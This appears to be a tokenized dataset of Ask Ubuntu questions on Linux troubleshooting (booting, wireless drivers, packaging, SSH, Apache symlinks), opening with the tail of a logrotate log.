to /var/log/archive/daemon.log-20140713 creating new /var/log/daemon.log mode = 0640 uid = 105 gid = 4 renaming /var/log/kern.log to /var/log/archive/kern.log-20140713 creating new /var/log/kern.log mode = 0640 uid = 105 gid = 4 renaming /var/log/auth.log to /var/log/archive/auth.log-20140713 creating new /var/log/auth.log mode = 0640 uid = 105 gid = 4 renaming /var/log/user.log to /var/log/archive/user.log-20140713 creating new /var/log/user.log mode = 0640 uid = 105 gid = 4 renaming /var/log/lpr.log to /var/log/archive/lpr.log-20140713 creating new /var/log/lpr.log mode = 0640 uid = 105 gid = 4 renaming /var/log/debug to /var/log/archive/debug-20140713 creating new /var/log/debug mode = 0640 uid = 105 gid = 4 renaming /var/log/messages to /var/log/archive/messages-20140713 creating new /var/log/messages mode = 0640 uid = 105 gid = 4 running postrotate script removing old log /var/log/archive/syslog-20130714.bz2 removing old log /var/log/archive/mail.info-20130714.bz2 removing old log /var/log/archive/mail.warn-20130714.bz2 removing old log /var/log/archive/mail.err-20130714.bz2 removing old log /var/log/archive/mail.log-20130714.bz2 removing old log /var/log/archive/daemon.log-20130714.bz2 removing old log /var/log/archive/kern.log-20130714.bz2 removing old log /var/log/archive/auth.log-20130714.bz2 removing old log /var/log/archive/user.log-20130714.bz2 removing old log /var/log/archive/lpr.log-20130714.bz2 removing old log /var/log/archive/debug-20130714.bz2 removing old log /var/log/archive/messages-20130714.bz2 rotating pattern : /var/log/teamspeak3/ts3server_*.log weekly ( 52 rotations ) olddir is /var/log/archive , empty log files are rotated , old logs are removed considering log /var/log/teamspeak3/ts3server_0.log log needs rotating considering log /var/log/teamspeak3/ts3server_1.log log needs rotating rotating log /var/log/teamspeak3/ts3server_0.log , log- > rotatecount is 52 dateext suffix '-20140713' glob pattern '- [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] ' compressing log with : /bin/bzip2 rotating log /var/log/teamspeak3/ts3server_1.log , log- > rotatecount is 52 dateext suffix '-20140713' glob pattern '- [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] ' compressing log with : /bin/bzip2 renaming /var/log/teamspeak3/ts3server_0.log to /var/log/archive/ts3server_0.log-20140713 creating new /var/log/teamspeak3/ts3server_0.log mode = 0640 uid = 999 gid = 4 renaming /var/log/teamspeak3/ts3server_1.log to /var/log/archive/ts3server_1.log-20140713 creating new /var/log/teamspeak3/ts3server_1.log mode = 0640 uid = 999 gid = 4 running postrotate script rotating pattern : /var/log/upstart/*.log weekly ( 52 rotations ) olddir is /var/log/archive , empty log files are not rotated , old logs are removed considering log /var/log/upstart/ident.log log needs rotating considering log /var/log/upstart/mysql.log log needs rotating rotating log /var/log/upstart/ident.log , log- > rotatecount is 52 dateext suffix '-20140713' glob pattern '- [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] ' renaming /var/log/upstart/ident.log to /var/log/archive/ident.log-20140713 compressing log with : /bin/bzip2 rotating log /var/log/upstart/mysql.log , log- > rotatecount is 52 dateext suffix '-20140713' glob pattern '- [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] ' destination /var/log/archive/mysql.log-20140713.bz2 already exists , skipping rotation rotating pattern : /var/log/wtmp monthly ( 1 rotations ) olddir is /var/log/archive , empty log files are rotated , old logs are removed considering log /var/log/wtmp log does not need rotating rotating pattern : /var/log/btmp monthly ( 1 rotations ) olddir is /var/log/archive , empty log files are rotated , old logs are removed considering log /var/log/btmp log does not need rotating run-parts : /etc/cron.daily/logrotate exited with return code 1
498531	can not boot windows on legacy bios after installing ubuntu on uefi	long story short , i installed ubuntu while i was watching netflix and feeling very lazy , and may have lost all my windows 7 files . quick summary : -windows 7 was installed on legacy bios and i installed ubuntu on uefi bios -ubuntu installer did n't detect any other os on my computer and wanted to write over the disk , so i had to manually edit the partition -despite repeated warnings about partitioning windows in the ubuntu installer , i did this anyway , assigning 140 gigs to ubuntu and 500 to windows now , my computer wo n't boot into anything but ubuntu -in gparted , it still shows that i have two partitions , and windows 7 boot loader -however , i ca n't boot into the non-linux partition , and boot loader says i need a recovery disk . my question is does anyone know if what i 've done is fixable ? i 'm hoping that i can fix it using the way outlined in this thread : ca n't boot windows 7 after installing ubuntu thanks for the help everyone ! note : gparted shows : foudn linux image : /boot/vmlinuz - 3.13.0.30 - generic found linitrd image : /boot/initrd.img - 3.13.0 - 30 - generic found linux image : /boot/vmlinuz - 3.13.0 - 24 generic found initrd image : /boot/initrd.img - 3.13.0 - 24- generic memtest memtest found windows 7 ( loader ) on /dev/sda1
498532	unigine heaven run directly from terminal ?	i think a lot of you would have benchmarked your linux system using unigine heaven benchmark 4.0 . i know to run the it you can simply go to the unigine heaven folder and run the shell script file using `` ./heaven '' . and then the settings window will open in which you configure and click on `` run '' button . what i want to do is from shell script . all i want is to know if there is some way i can modify the script so that it does n't show the settings window where i need to click `` run '' but directly starts the benchmarking using the default settings . so can anyone please let me know the modification in the script so that i can just run the script and no intermediate settings window appears rather benchmarking starts directly.. ? also is there some keyboard shortcut to `` run '' i.e . i press some combination of keys and benchmarking starts . thanks
498533	command to send sms from terminal using kannel + smpp	i have installed the kannel on my server , configured the kannel file as per the requirement . started the bearerbox and smsbox , both boxes are running fine . now i want to check if the sms is being pushed or not ? any one having knowledge kannel + smpp then please try to help me . if you cant then please give me relevant website , where i can ask the same question . thanks regards , rohit bind
498537	linux-header 3.2.0-61 archive fail	thomas @ ubuntu : ~ $ sudo apt-get dist-upgrade [ sudo ] password for thomas : reading package lists ... done building dependency tree reading state information ... done e : the package linux-headers-3.2.0-61 needs to be reinstalled , but i ca n't find an archive for it . thomas @ ubuntu : ~ $ this is what i get whenever i try to do anything inside of the terminal , open the software center , or even the update manager .
498538	ip forwarding set up so the nodes can get to the internet through your maas host ?	how to set up ip forwarding , so the nodes can get to the internet through your maas host ? although my setup runs maas , commissions servers , turns nodes on and off , nodes are at ready state . i have a juju issue , that i just can shake . i am looking to see if there is any special routing between , the maas/region/cluster located @ 192.xxx.xxx.xxx/maas on eth0 has full internet access . and the internal private network address where the 10 nodes are located @ 10.xx.xx.xx . now this is metal none vm . please be specific when answer is posted . any help , will be great .
498539	ssh remote command execute stays without disconnect when finished execute ?	i am trying to build a script/command that will restart our asterisk/elastix service on our pbx . the script is basically using simple command with auto log-in public key that run from ubuntu 14.04lts : the command script is : ssh user @ iphost 'service asterisk restart' but after the command finished and service restarted , the ssh stays and only after ctrlc its breaks out . my question , is how can i terminate the session after the command completes ?
498545	ca n't login to ubuntu 14.04 lts , just loops back to login screen ( with standard desktop environment ) ?	my ubuntu is in a login loop , there show a guest account however i had previously set ubuntu to log in automatically , is . not go to login screen . initially it was stuck as i had set tightvncserver to start with rc-update but now after removing a new problem arises . anyone have any ideas on how to fix ? i should mention that it seems to login as the desktop wallpaper changes , and i can access icons in top right of screen . xsession errors : critical : we failed , but the fail whale is dead . sorry ... . error : gsm-manager code should not be reached
498546	i want to know if i can have two music libraries	is there a way that i can have two media players like banshee with their own library , so that i can import new mp3 's without affecting the music which is in my music library which is already sorted ?
498548	ubuntu vm wo n't boot : âno init found .try passing init=bootargâ	after restarting a server , i got to restart some vms hosted on it . but a ubuntu vm wo n't start : here 's what shows up after running the vm via virtual manager : boot from ( hd0,0 ) ext4 a1d581d-90a7-44dc-b319-e4ad25ded49a starting up ... mount mounting /dev/disk/by-uuid/a1d581d-90a7-44dc-b319-e4ad25ded49a on /root failed : invalid argument mount : mounting /dev on /root/dev failed : no such file or directory mount : mounting /sys on /root/sys failed : no such file or directory mount : mounting /proc on /root/proc failed : no such file or directory target filesystem does n't have requested /sbin/init no init found . try passing init= bootarg . busybox v1.18.4 ( ubuntu 1:1.18.4-2ubuntu2 ) build-in shell ( ash ) enter 'help for a list of built-in command . ( initramfs ) _ http : //i.imgur.com/li7gk2r.png this problem has been debated a few times on askubuntu , but no solution were applicable in my case ( like to boot up from livecd ) , or were not working : for example , i tried to unmount the partition that contains the vms images , and ran fsck on it . it came out clean , but i still have this problem when i mount the partition back and try to run the ubuntu vm . now , i really do n't know what to do . do you have any ideas about how to fix this problem ? thanks !
498555	moving away from root user	i 've recently been asked to help out a friend with some server and website issues they have been having , nothing major really . however i found out that since the day they got their vps everything , including uploading files , installing wordpress , all ftp , everything has been done through root . so i am wondering what is the best way to fix everything to make it more secure ? the reason im asking is because im assuming its more than just make a new non-root user to use for day to day stuff ? due to how everything has been set up and ownerships already with every other file etc
498557	lock screen automatically in cinnamon	how can i set computer to turn off my monitor and lock my screen after a minute in cinnamon . in unity i can just go to brightness and lock and set it but in cinnamon i ca n't see that setting . if i go to power management , shortest time available is 5 minutes that is too long .
498562	which arguments are passed to init scripts during shutdown	i am currently looking at the startup and shutdown procedures for ubunut precise pangolin . as far as i understand at shutdown the system switches to runlevel 0 and all scripts with k* are executed with the argument stop and all scripts with s* are executed with the argument start . now looking at rc.0 i can see the following scripts : lrwxrwxrwx 1 root root 16 1 . jan 2000 k20dhcpcd - > ../init.d/dhcpcd lrwxrwxrwx 1 root root 20 1 . jan 2000 s35networking - > ../init.d/networking lrwxrwxrwx 1 root root 14 5 . apr 2013 s90halt - > ../init.d/halt lrwxrwxrwx 1 root root 20 5 . apr 2013 s60umountroot - > ../init.d/umountroot lrwxrwxrwx 1 root root 18 5 . apr 2013 s40umountfs - > ../init.d/umountfs lrwxrwxrwx 1 root root 22 5 . apr 2013 s31umountnfs.sh - > ../init.d/umountnfs.sh lrwxrwxrwx 1 root root 17 5 . apr 2013 s30urandom - > ../init.d/urandom lrwxrwxrwx 1 root root 18 5 . apr 2013 s20sendsigs - > ../init.d/sendsigs lrwxrwxrwx 1 root root 19 26 . aug 2013 k90syslog-ng - > ../init.d/syslog-ng which means umountfs , sendsigs and halt will be executed with the argument start . but looking at the code for example in s90halt i find the following : case `` $ 1 '' in start ) # no-op ; ; restart|reload|force-reload ) echo `` error : argument ' $ 1 ' not supported '' > & 2 exit 3 ; ; stop ) do_stop ; ; * ) echo `` usage : $ 0 start|stop '' > & 2 exit 3 ; ; esac i.e . this script does nothing when it gets called with start and only actually halts the system when it is called with stop . i can not find any reference to this script as a kill script , so when does this happen ?
498564	left mouse sometimes stops working after sleep	i have a laptop ( hp elitebook ) with the latest ubuntu ( 14.04 desktop 64 bit ) installed . when i close the lid it goes into sleep mode . when i wake it up again , the left mouse button regularily stops working . it does not happen all the time and there was no common reason i found apart from sleep mode . the left mouse button of the touchpad as well as the left click of the trackpoint mouse stop working , and the touch screen does not react to the left mouse button as well . i can move the mouse cursor and right-click properly . i found several `` solutions '' restarting drivers with modprobe , but none of them seem to work . i could n't find anything in logs ( or i just do n't know what i 'm supposed to be looking for ) . is there anything i could try or look for ?
498567	intel ac 7620 no internet , still connected to network	i bought a new asus n550jv laptop which has a intel ac 7620 wireless card inside of it . i installed arch linux on it and noticed that i will be connected to my corporate wifi and every once and a while i will just lose all internet connectivity , but my wifi connection says it 's fine . after enough times of connecting and restarting , sometimes it seems to work . i got it to randomly yesterday for almost 4 hours . i tried going to linux-wireless and downloading the newest iwlwifi driver i can use , version 22.24.8.0 . did n't seem to help . also tired the solution in no more internet connection after update in 14.04 with intel dual band wireless ac 7260 and that did n't work as well . i have tried using different distros in some vain attempt to fix this : arch linux , linux mint 17 , ubuntu 14.04 , ubuntu 12.10 , and a new other ubuntu variants . the module parameters right now sudo grep -h '' /sys/module/iwlwifi/parameters/* /sys/module/iwlwifi/parameters/11n_disable:0 /sys/module/iwlwifi/parameters/amsdu_size_8k:0 /sys/module/iwlwifi/parameters/antenna_coupling:0 /sys/module/iwlwifi/parameters/bt_coex_active : y /sys/module/iwlwifi/parameters/fw_restart : y /sys/module/iwlwifi/parameters/led_mode:0 /sys/module/iwlwifi/parameters/nvm_file : ( null ) /sys/module/iwlwifi/parameters/power_level:0 /sys/module/iwlwifi/parameters/power_save : n /sys/module/iwlwifi/parameters/swcrypto:0 /sys/module/iwlwifi/parameters/wd_disable:1 the module info modinfo iwlwifi filename : /lib/modules/3.13.0-24-generic/kernel/drivers/net/wireless/iwlwifi/iwlwifi.ko license : gpl author : copyright ( c ) 2003-2013 intel corporation < ilw @ linux.intel.com > version : in-tree : description : intel ( r ) wireless wifi driver for linux firmware : iwlwifi-100-5.ucode firmware : iwlwifi-1000-5.ucode firmware : iwlwifi-135-6.ucode firmware : iwlwifi-105-6.ucode firmware : iwlwifi-2030-6.ucode firmware : iwlwifi-2000-6.ucode firmware : iwlwifi-5150-2.ucode firmware : iwlwifi-5000-5.ucode firmware : iwlwifi-6000g2b-6.ucode firmware : iwlwifi-6000g2a-5.ucode firmware : iwlwifi-6050-5.ucode firmware : iwlwifi-6000-4.ucode firmware : iwlwifi-3160-7.ucode firmware : iwlwifi-7260-7.ucode srcversion : 1e6912e109d5a43b310fb34 alias : pci : v00008086d0000095asv*sd00005490bc*sc*i* ... a ton of aliases here alias : pci : v00008086d00004232sv*sd00001201bc*sc*i* depends : cfg80211 intree : y vermagic : 3.13.0-24-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : 69 : b0 : d0 : a7:9b:85 : d9:06:21:70:6e:8d:06:60:4d:73:0b:35:9f : c0 sig_hashalgo : sha512 parm : swcrypto : using crypto in software ( default 0 [ hardware ] ) ( int ) parm : 11n_disable : disable 11n functionality , bitmap : 1 : full , 2 : disable agg tx , 4 : disable agg rx , 8 enable agg tx ( uint ) parm : amsdu_size_8k : enable 8k amsdu size ( default 0 ) ( int ) parm : fw_restart : restart firmware in case of error ( default true ) ( bool ) parm : antenna_coupling : specify antenna coupling in db ( defualt : 0 db ) ( int ) parm : wd_disable : disable stuck queue watchdog timer 0=system default , 1=disable , 2=enable ( default : 0 ) ( int ) parm : nvm_file : nvm file name ( charp ) parm : bt_coex_active : enable wifi/bt co-exist ( default : enable ) ( bool ) parm : led_mode:0=system default , 1=on ( rf on ) /off ( rf off ) , 2=blinking , 3=off ( default : 0 ) ( int ) parm : power_save : enable wifi power management ( default : disable ) ( bool ) parm : power_level : default power save level ( range from 1 - 5 , default : 1 ) ( int ) the dmesg for iwlwifi dmesg | grep iwlwifi [ 23.538445 ] iwlwifi 0000:04:00.0 : irq 54 for msi/msi-x [ 23.763701 ] iwlwifi 0000:04:00.0 : loaded firmware version 22.24.8.0 op_mode iwlmvm [ 23.773794 ] iwlwifi 0000:04:00.0 : detected intel ( r ) dual band wireless ac 7260 , rev=0x144 [ 23.773849 ] iwlwifi 0000:04:00.0 : l1 disabled ; enabling l0s [ 23.774078 ] iwlwifi 0000:04:00.0 : l1 disabled ; enabling l0s [ 29.060120 ] iwlwifi 0000:04:00.0 : l1 disabled ; enabling l0s [ 29.060349 ] iwlwifi 0000:04:00.0 : l1 disabled ; enabling l0s [ 33.188933 ] iwlwifi 0000:04:00.0 : no association and the time event is over already ... [ 1364.975013 ] iwlwifi 0000:04:00.0 : rf_kill bit toggled to disable radio . [ 1366.269647 ] iwlwifi 0000:04:00.0 : rf_kill bit toggled to enable radio . [ 1366.270713 ] iwlwifi 0000:04:00.0 : l1 disabled ; enabling l0s [ 1366.270957 ] iwlwifi 0000:04:00.0 : l1 disabled ; enabling l0s [ 1579.332242 ] iwlwifi 0000:04:00.0 : rf_kill bit toggled to disable radio . [ 1582.073419 ] iwlwifi 0000:04:00.0 : rf_kill bit toggled to enable radio . [ 1582.075299 ] iwlwifi 0000:04:00.0 : l1 disabled ; enabling l0s [ 1582.075551 ] iwlwifi 0000:04:00.0 : l1 disabled ; enabling l0s has anyone else had this problem ? i have been trying to fix this for almost 2 months .
498570	ubuntu 14.04lts - hotkeys do n't work unless an application is open	this is a strange one for you all ! i 'm using ubuntu 14.04lts and i have guake terminal installed which has a hotkey to make it pop open on the screen when i press f12 . this stopped working a few days ago . but i initially thought it was a problem with guake but now i find that no hotkeys work unless i have any application open and running . so , for example . if i just have a blank desktop showing then when i press f12 nothing happens , if i press any of my keyboard special keys which open a calculator or email application nothing happens . if i open up any application , e.g . chrome / libreoffice and then press f12 - guake opens , if i press the keyboard button for the calculator - it opens . when i close the application , e.g . chrome or libreoffice , and try the hotkeys again - nothing happens . what could be causing this ?
498574	unable to create custom debian package	we are trying to create a custom debian package and trying to create custom apt-get repository . for this we did the following : in ~ directory extracted the source file called monitor-0.1+monitor1.0.0.tar.gz cd monitor-0.1+monitor1.0.0 then we run this command dh_make -e myemail @ domain.com -f ../monitor-0.1+monitor1.0.0.tar.gz it created debian folder and changed control file and changelog file the control file is as follows : source : monitor section : base priority : extra maintainer : root build-depends : debhelper ( > = 8.0.0 ) standards-version : 3.9.2 package : monitor architecture : any depends : mono-runtime , $ { shlibs : depends } , $ { misc : depends } description : monitor tool then in ~/monitor-0.1+monitor1.0.0 directory we executed this command : dpkg-buildpackage -rfakeroot after execution in ~ it created following files monitor_0.1+monitor1.0.0-1_amd64.changes monitor_0.1+monitor1.0.0-1_amd64.deb monitor_0.1+monitor1.0.0-1.debian.tar.gz monitor_0.1+monitor1.0.0-1.dsc then we tried installing this deb package and also tried extracting this monitor_0.1+monitor1.0.0-1_amd64.deb file it does'nt have monitor directory it only have /usr/share/doc/monitor folder . can anyone please guide us on this . we are first time doing this . thanks
498577	installing the boot loader in a seperate pendrive	i want to install ubuntu 14.04 desktop in a pc in which there is two hard drives 1tb and other is 80gb windows 7 is installed in the 1tb hd so i am not going to touch it and install ubuntu in the 80gb hd my question is could i install ubuntu in that â80gb hd and install the boot loader alone in a pendrive so that the system will automatically boot to windows when that pendrive is not connected .
498578	circular symbolic link in /var/www/	i am running apache2 . i am trying to make a symbolic link from my project location to apache 's /var/www/ , where it pulls the files to host . inside my project directory myproject , i ran : sudo ln -s . /var/www/myproject when i go to 0.0.0.0:90 , it does display the myproject folder in the index . however , each time i click myproject , the server circulates back to the original index . if i click myproject 3 times , the url becomes 0.0.0.0:90/myproject/myproject/myproject , with the index being the same as just 0.0.0.0:90 here is my /etc/apache2/sites-enabled/000-default < virtualhost *:90 > serveradmin webmaster @ localhost documentroot /var/www < directory / > options followsymlinks allowoverride none < /directory > < directory /var/www/ > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined < /virtualhost > i tried changing the followsymlinks to +followsymlinks , no effect . any ideas ? thanks
498579	virtualbox guestaddition version from vm client	sometimes ubuntu behave weird , which might be because because it runs within virtualbox as a client os . i want to detect if virtualbox guestaddition is installed , from within the vm client , and which version it is . on the server it can be detected using the virtualbox api , but i want to be able to detect it on the vm client itself . virtualbox guest addition can be installed using statement how-do-i-install-guest-additions-in-a-virtualbox-vm : sudo apt-get install virtualbox-ose-guest-x11 so apt-get must `` know '' about the installation . apt-get does not have a search function so i tried : dpkg -- list | grep virtualbox with result : bernard @ bernard-vbox2 : ~ $ dpkg -- list | grep virtualbox ii unity-scope-virtualbox 0.1+13.10.20130723-0ubuntu1 all virtualbox scope for unity bernard @ bernard-vbox2 : ~ someting about virtualbox , but not about vbox guest addition on my system i presume ( info source ) vbox guest addition is installed in /opt/ [ vboxaddonsfolder ] the folder does exist on my system but i can not find a ( general ) method to retrieve the vbox guestaddition version . on takkat advise i installed vbox guest addition . my preference to do this in the terminal . bash sudo apt-get update sudo apt-get install build-essential linux-headers- $ ( uname -r ) sudo apt-get install virtualbox-guest-x11 installed with succes my guestadditions .
498581	for an automated install of .deb i need to set dpkg : :options before installing package with new conffile	i have a custom debian package that creates a touch-screen calibration file and will be deployed for automatic updating . i want to preserve the calibration file if the user has changed it , so my new version of the package has declared this file a `` conffile '' . the issue is that upon the upgrade to my new version of the package there will be a `` conffile '' dialog configuration file `/etc/penmount/penmount.dat' == > modified ( by you or by a script ) since installation . == > package distributor has shipped an updated version . what would you like to do about it ? your options are : y or i : install the package maintainer 's version n or o : keep your currently-installed version d : show the differences between the versions z : start a shell to examine the situation the default action is to keep your current version . *** bash.bashrc ( y/i/n/o/d/z ) [ default=n ] ? i can answer this automatically by creating a /etc/apt/apt.conf/local file with the content : dpkg : :options { `` -- force-confdef '' ; `` -- force-confold '' ; } my approach has been to create this local and install it with another package and then use a pre-depends to get this package installed before the upgrade of the package with the conffile . howver , when i do a dist-upgrade both packages get installed , but the install is halted by dialog above . if i install the package that sets the dpkg options first followed by an install of my `` conffile '' package the questions are handled automatically . how to mark an existing configuration file as a conffile and do an automatic update in one pass ?
498584	why bash files are not executed ?	why bash are not executed when i double click on them ? they are executable but they are not executed . instead they are opened with gedit .
498587	intel centrino advanced-n 6200 wo n't connect to wpa psk or wpa peap . wep and open works . 14.04lts	cliffs : ca n't get this to work with wpa psk or wpa peap . same laptop ( dell latitude e6410 ) with a no-name usb wifi dongle works fine connecting to the same networks . i realize this hardware is known to be buggy with 802.11n so i disabled it and got the same results . i also tried the system_certs trick and that did n't make any difference either . tl ; dr : iwlwifi 0000:02:00.0 : detected intel ( r ) centrino ( r ) advanced-n 6200 agn , rev=0x74 iwlwifi 0000:02:00.0 : direct firmware load failed with error -2 iwlwifi 0000:02:00.0 : direct firmware load failed with error -2 iwlwifi 0000:02:00.0 : loaded firmware version 9.221.4.1 build 25532 op_mode iwldvm tried all three firmware blobs on kernel.org , no change in behavior . syslog during connection attempt for wpa peap : jul 16 10:54:45 networkmanager [ 1041 ] : < info > ( wlan0 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] jul 16 10:54:45 networkmanager [ 1041 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) scheduled ... jul 16 10:54:45 networkmanager [ 1041 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) started ... jul 16 10:54:45 networkmanager [ 1041 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) scheduled ... jul 16 10:54:45 networkmanager [ 1041 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) complete . jul 16 10:54:45 networkmanager [ 1041 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) starting ... jul 16 10:54:45 networkmanager [ 1041 ] : < info > ( wlan0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] jul 16 10:54:45 networkmanager [ 1041 ] : < info > activation ( wlan0/wireless ) : access point 'mynetwork ' has security , but secrets are required . jul 16 10:54:45 networkmanager [ 1041 ] : < info > ( wlan0 ) : device state change : config - > need-auth ( reason 'none ' ) [ 50 60 0 ] jul 16 10:54:45 networkmanager [ 1041 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) complete . jul 16 10:55:04 networkmanager [ 1041 ] : get_secret_flags : assertion 'is_secret_prop ( setting , secret_name , error ) ' failed jul 16 10:55:04 networkmanager [ 1041 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) scheduled ... jul 16 10:55:04 networkmanager [ 1041 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) started ... jul 16 10:55:04 networkmanager [ 1041 ] : < info > ( wlan0 ) : device state change : need-auth - > prepare ( reason 'none ' ) [ 60 40 0 ] jul 16 10:55:04 networkmanager [ 1041 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) scheduled ... jul 16 10:55:04 networkmanager [ 1041 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) complete . jul 16 10:55:04 networkmanager [ 1041 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) starting ... jul 16 10:55:04 networkmanager [ 1041 ] : < info > ( wlan0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] jul 16 10:55:04 networkmanager [ 1041 ] : < info > activation ( wlan0/wireless ) : connection 'mynetwork ' has security , and secrets exist . no new secrets needed . jul 16 10:55:04 networkmanager [ 1041 ] : < info > config : added 'ssid ' value 'mynetwork' jul 16 10:55:04 networkmanager [ 1041 ] : < info > config : added 'scan_ssid ' value '1' jul 16 10:55:04 networkmanager [ 1041 ] : < info > config : added 'key_mgmt ' value 'wpa-eap' jul 16 10:55:04 networkmanager [ 1041 ] : < info > config : added 'password ' value ' < omitted > ' jul 16 10:55:04 networkmanager [ 1041 ] : < info > config : added 'eap ' value 'peap' jul 16 10:55:04 networkmanager [ 1041 ] : < info > config : added 'fragment_size ' value '1300' jul 16 10:55:04 networkmanager [ 1041 ] : < info > config : added 'phase2 ' value 'auth=mschapv2' jul 16 10:55:04 networkmanager [ 1041 ] : < info > config : added 'identity ' value 'username @ mynetwork.com' jul 16 10:55:04 networkmanager [ 1041 ] : < info > config : added 'bgscan ' value 'simple:30 : -65:300' jul 16 10:55:04 networkmanager [ 1041 ] : < info > config : added 'proactive_key_caching ' value '1' jul 16 10:55:04 networkmanager [ 1041 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) complete . jul 16 10:55:04 networkmanager [ 1041 ] : < info > config : set interface ap_scan to 1 jul 16 10:55:04 networkmanager [ 1041 ] : < info > ( wlan0 ) : supplicant interface state : inactive - > scanning jul 16 10:55:04 wpa_supplicant [ 1488 ] : message repeated 4 times : [ wlan0 : ctrl-event-scan-started ] jul 16 10:55:07 wpa_supplicant [ 1488 ] : wlan0 : sme : trying to authenticate with 8c:0c:90 : xx : xx : xx ( ssid='mynetwork ' freq=2412 mhz ) jul 16 10:55:07 kernel : [ 1851.996119 ] wlan0 : authenticate with 8c:0c:90 : xx : xx : xx jul 16 10:55:07 networkmanager [ 1041 ] : < info > ( wlan0 ) : supplicant interface state : scanning - > authenticating jul 16 10:55:07 kernel : [ 1852.036087 ] wlan0 : direct probe to 8c:0c:90 : xx : xx : xx ( try 1/3 ) jul 16 10:55:07 kernel : [ 1852.237367 ] wlan0 : direct probe to 8c:0c:90 : xx : xx : xx ( try 2/3 ) jul 16 10:55:07 kernel : [ 1852.441249 ] wlan0 : direct probe to 8c:0c:90 : xx : xx : xx ( try 3/3 ) jul 16 10:55:07 kernel : [ 1852.645135 ] wlan0 : authentication with 8c:0c:90 : xx : xx : xx timed out jul 16 10:55:08 wpa_supplicant [ 1488 ] : wlan0 : ctrl-event-ssid-temp-disabled id=0 ssid= '' mynetwork '' auth_failures=1 duration=10 jul 16 10:55:08 networkmanager [ 1041 ] : < info > ( wlan0 ) : supplicant interface state : authenticating - > disconnected jul 16 10:55:18 wpa_supplicant [ 1488 ] : wlan0 : ctrl-event-scan-started jul 16 10:55:18 networkmanager [ 1041 ] : < info > ( wlan0 ) : supplicant interface state : disconnected - > scanning jul 16 10:55:18 wpa_supplicant [ 1488 ] : wlan0 : ctrl-event-ssid-reenabled id=0 ssid= '' mynetwork '' jul 16 10:55:23 wpa_supplicant [ 1488 ] : wlan0 : ctrl-event-scan-started jul 16 10:55:26 wpa_supplicant [ 1488 ] : wlan0 : sme : trying to authenticate with 8c:0c:90 : xx : xx : xx ( ssid='mynetwork ' freq=2412 mhz ) jul 16 10:55:26 kernel : [ 1870.763176 ] wlan0 : authenticate with 8c:0c:90 : xx : xx : xx jul 16 10:55:26 networkmanager [ 1041 ] : < info > ( wlan0 ) : supplicant interface state : scanning - > authenticating jul 16 10:55:26 kernel : [ 1870.772886 ] wlan0 : direct probe to 8c:0c:90 : xx : xx : xx ( try 1/3 ) jul 16 10:55:26 kernel : [ 1870.975037 ] wlan0 : direct probe to 8c:0c:90 : xx : xx : xx ( try 2/3 ) jul 16 10:55:26 kernel : [ 1871.178935 ] wlan0 : direct probe to 8c:0c:90 : xx : xx : xx ( try 3/3 ) jul 16 10:55:26 kernel : [ 1871.382792 ] wlan0 : authentication with 8c:0c:90 : xx : xx : xx timed out jul 16 10:55:26 wpa_supplicant [ 1488 ] : wlan0 : ctrl-event-ssid-temp-disabled id=0 ssid= '' mynetwork '' auth_failures=2 duration=20 jul 16 10:55:26 networkmanager [ 1041 ] : < info > ( wlan0 ) : supplicant interface state : authenticating - > disconnected jul 16 10:55:29 networkmanager [ 1041 ] : < warn > activation ( wlan0/wireless ) : association took too long , failing activation . jul 16 10:55:29 networkmanager [ 1041 ] : < info > ( wlan0 ) : device state change : config - > failed ( reason 'ssid not found ' ) [ 50 120 53 ] jul 16 10:55:29 networkmanager [ 1041 ] : < warn > activation ( wlan0 ) failed for connection 'mynetwork' jul 16 10:55:29 networkmanager [ 1041 ] : < info > ( wlan0 ) : device state change : failed - > disconnected ( reason 'none ' ) [ 120 30 0 ] jul 16 10:55:29 networkmanager [ 1041 ] : < info > ( wlan0 ) : deactivating device ( reason 'none ' ) [ 0 ] jul 16 10:55:29 wpa_supplicant [ 1488 ] : wlan0 : ctrl-event-scan-started jul 16 10:55:32 networkmanager [ 1041 ] : < info > ( wlan0 ) : supplicant interface state : disconnected - > inactive
